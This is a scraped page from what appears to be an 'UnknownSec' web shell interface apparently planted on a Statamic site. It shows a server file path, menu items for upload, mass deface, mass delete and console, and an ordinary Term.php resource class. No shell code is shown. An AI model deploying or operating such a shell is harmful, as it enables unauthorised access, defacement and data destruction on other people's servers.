shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Http
/
Resources
/
CP
/
Taxonomies
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Term.php
<?php namespace Statamic\Http\Resources\CP\Taxonomies; use Illuminate\Http\Resources\Json\JsonResource; class Term extends JsonResource { public function toArray($request) { $data = [ 'id' => $this->resource->id(), 'title' => $this->resource->value('title'), 'permalink' => $this->resource->absoluteUrl(), 'edit_url' => $this->resource->editUrl(), ]; return ['data' => $data]; } }
© 2026 UnknownSec